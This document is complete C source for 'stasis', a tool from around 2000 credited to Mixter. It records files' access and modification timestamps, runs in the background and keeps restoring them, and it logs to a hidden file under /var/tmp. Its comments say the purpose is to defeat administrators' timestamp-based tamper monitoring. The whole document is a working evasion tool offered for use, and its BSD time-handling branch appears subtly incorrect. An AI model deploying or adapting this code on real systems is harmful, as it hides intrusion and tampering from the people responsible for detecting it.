Stasis is a tool to fool atime/mtime timestamp checking. It records the timestamp of files, then periodically finds atime/mtime changes and restores the old timestamps, as if the files were never accessed / changed.
eb63609efc1350e5ecc18faffda1b59339dc10d5a460127fa971feb32673d225
/*
stasis.c - timestamp suspension tool - 01/00 by Mixter
this ia a simple file monitoring tool that records the timestamp of
files, then periodically finds atime/mtime changes and restores the
old timestamps, as if the files were never accessed / changed.
this shows that timestamp monitoring is not very foolproof, and can
be used to fool some lame admins and script kiddies' atime/mtime scan
based protection scripts for eggdrop tcl and other programs easily.
compile with -DBSD if your system doesn't have working utime()...
#include <std_disclaimer.h>
#include <lame_advertisement.h>
http://mixter.void.ru / http://mixtersecurity.tripod.com
*/
#define MINUTES_DELAY 3 /* delay between file scans */
#define LOGFILE "/var/tmp/.s3kr1t" /* optional to define */
#define DELAY MINUTES_DELAY * 60
#include <stdio.h>
#include <unistd.h>
#include <utime.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#ifndef BSD /* OS specific utime functions */
#include <stdlib.h>
#define UTIME_ENT struct utimbuf
#define UTIME_ATIME actime
#define UTIME_MTIME modtime
#define UTIME_F utime
#else
#include <malloc.h>
#include <sys/time.h>
#define UTIME_ENT struct timeval
#define UTIME_ATIME tv_sec
#define UTIME_MTIME tv_usec
#define UTIME_F utimes
#endif
#ifdef LOGFILE
void
log (char *a, char *b)
{
FILE *ph1le = fopen (LOGFILE, "a");
fprintf (ph1le, "%s %s\n", a, b);
fclose (ph1le);
}
#endif
struct fhash /* filename / time association struct */
{
char filename[255];
UTIME_ENT timebuf;
struct fhash *next;
}
*fstart, *fcurr;
int
main (int argc, char **argv)
{
FILE *list;
char buffer[512];
struct stat statbuf;
int counter = 0;
fstart = malloc (sizeof (struct fhash));
fstart->next = NULL;
fcurr = fstart;
if (argc != 2)
{
doh:
fprintf (stderr, "Usage: %s <file list>\n", argv[0]);
fprintf (stderr, "Make a file list by typing something like: find / -type -f > list.txt\n");
exit (0);
}
if ((list = fopen (argv[1], "r")) == NULL)
goto doh;
/* read filename timestamps */
while (fgets (buffer, 255, list) != NULL)
{
buffer[strlen(buffer)-1] = '\0'; /* pesky \n's */
if (lstat (buffer, &statbuf) != 0)
{
#ifdef LOGFILE
log ("ignoring non existant file: ", buffer);
#endif
continue;
}
strncpy (fcurr->filename, buffer, 254);
fcurr->timebuf.UTIME_ATIME = statbuf.st_atime;
fcurr->timebuf.UTIME_MTIME = statbuf.st_mtime;
fcurr->next = malloc (sizeof (struct fhash));
fcurr = fcurr->next;
counter++;
}
free (fcurr->next);
fcurr->next = NULL;
printf ("Going into background, monitoring %d files\n", counter);
if (fork())
exit(0);
/* comparison routine */
while (1)
{
sleep (DELAY);
for (fcurr = fstart; fcurr->next != NULL; fcurr = fcurr->next)
{
if (lstat (fcurr->filename, &statbuf) != 0)
{
#ifdef LOGFILE
log ("file has been deleted: ", fcurr->filename);
#endif
continue;
}
if (fcurr->timebuf.UTIME_ATIME != statbuf.st_atime)
{
#ifdef LOGFILE
log ("atime change reverted: ", fcurr->filename);
#endif
UTIME_F (fcurr->filename, &fcurr->timebuf);
}
if (fcurr->timebuf.UTIME_MTIME != statbuf.st_mtime)
{
#ifdef LOGFILE
log ("mtime change reverted: ", fcurr->filename);
#endif
UTIME_F (fcurr->filename, &fcurr->timebuf);
}
}
}
return 0;
}